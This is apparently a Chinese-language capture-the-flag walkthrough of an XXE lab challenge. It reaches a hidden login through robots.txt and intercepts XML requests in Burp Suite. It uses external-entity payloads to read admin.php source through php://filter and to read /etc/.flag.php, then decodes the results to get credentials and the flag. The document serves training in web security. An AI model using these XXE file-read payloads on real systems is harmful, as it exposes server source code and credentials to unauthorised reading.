步骤一,访问浏览器
步骤二,输入/robots.txt
步骤三,发现存在用户登录的一个界面/xxe
我们登录进去
步骤四,随便输入一个数字或者字母打开BP
抓到包之后发送的重放器里边
通过抓包发现是XML数据提交
步骤五,通过php://filter读取admin.php的文件源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
复制一下发送过去的一堆码
步骤六,复制完下面的话进行Base64编码
步骤七,得到用户名和密码,经过分析可知密码是通过MD5格式加密的
步骤八,输入/xxe/admin.php进行登录
步骤九,点击flag
点击完之后它会跳转的这个页面
步骤十,进行抓包读取fiagmeout.php
然后在Base64解码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
然后在用Base32解码
然后在用Base64解码
.....这次可真没了,晕的
步骤十一,在使用BP来读取 flagmeout.php 文件
<!DOCTYPE foo [
<!ENTITY admin SYSTEM "file:///etc/.flag.php" > ]
步骤十二,复制代码,新建一个名为flag.php文档粘贴进去,加PHP语句
步骤十三,把 php 文档放在 phpstudy 的 WWW目录中,开启 phpstudy.最后用浏览器去访问这个文件。
{xxe_is_so_easy}就是flag